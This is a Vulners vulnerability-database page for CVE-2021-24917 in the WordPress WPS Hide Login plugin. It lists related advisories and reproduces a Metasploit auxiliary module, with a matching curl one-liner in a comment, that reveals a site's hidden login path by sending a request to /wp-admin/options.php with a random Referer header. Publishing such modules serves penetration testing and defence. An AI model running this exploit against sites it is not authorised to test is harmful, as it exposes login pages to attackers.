Vulners
Lucene search
WordPress WPS Hide Login Login Page Revealer
🗓️ 01 Sep 2024 00:00:00Reported by h00die, thalakus, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 287 Views
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | CVE-2021-24917 | 6 Dec 202118:20 | – | circl |
 | WordPress 插件 安全漏洞 | 6 Dec 202100:00 | – | cnnvd |
 | WordPress WPS Hide Login plugin authorization issue vulnerability | 9 Dec 202100:00 | – | cnvd |
 | CVE-2021-24917 | 6 Dec 202115:55 | – | cve |
 | CVE-2021-24917 WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header | 6 Dec 202115:55 | – | cvelist |
 | Exploit for Incorrect Authorization in Wpserveur Wps_Hide_Login | 20 May 202402:07 | – | githubexploit |
 | WordPress WPS Hide Login Login Page Revealer | 16 Dec 202117:42 | – | metasploit |
 | WordPress WPS Hide Login <1.9.1 - Information Disclosure | 8 Jun 202604:09 | – | nuclei |
 | CVE-2021-24917 | 6 Dec 202116:15 | – | nvd |
 | WordPress WPS Hide Login Plugin < 1.9.1 Incorrect Authorization Vulnerability | 1 Aug 202200:00 | – | openvas |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress WPS Hide Login Login Page Revealer',
'Description' => %q{
This module exploits a bypass issue with WPS Hide Login version <= 1.9. WPS Hide Login
is used to make a new secret path to the login page, however a 'GET' request to
'/wp-admin/options.php' with a referer will reveal the hidden path.
},
'References' => [
['WPVDB', '15bb711a-7d70-4891-b7a2-c473e3e8b375'],
['CVE', '2021-24917'],
['URL', 'https://wordpress.org/support/topic/bypass-security-issue/']
],
'Author' => [
'thalakus', # Vulnerability discovery
'h00die' # Metasploit module
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
},
'DisclosureDate' => '2021-10-27',
'License' => MSF_LICENSE
)
)
end
def run_host(ip)
unless wordpress_and_online?
fail_with Failure::NotVulnerable, "#{ip} - Server not online or not detected as wordpress"
end
checkcode = check_plugin_version_from_readme('wps-hide-login', '1.9.1')
unless [Msf::Exploit::CheckCode::Vulnerable, Msf::Exploit::CheckCode::Appears, Msf::Exploit::CheckCode::Detected].include?(checkcode)
fail_with Failure::NotVulnerable, "#{ip} - A vulnerable version of the 'WPS Hide Login' was not found"
end
print_good("#{ip} - Vulnerable version of wps_hide_login detected")
print_status("#{ip} - Determining login page")
# curl --referer "something" -sIXGET http://<ip>/wp-admin/options.php
res = send_request_cgi({
'method' => 'GET',
'headers' => {
'Referer' => Rex::Text.rand_text_alphanumeric(rand(5..7))
},
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options.php')
})
fail_with Failure::Unreachable, "#{ip} - Connection failed" unless res
fail_with Failure::NotVulnerable, "#{ip} - Connection failed. Didn't receive a HTTP 302 redirect to the secret login page" if res.code != 302
if res.headers['Location']
print_good("Login page: #{res.headers['Location']}")
else
print_error('No location header found')
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 3.17.5
EPSS0.80712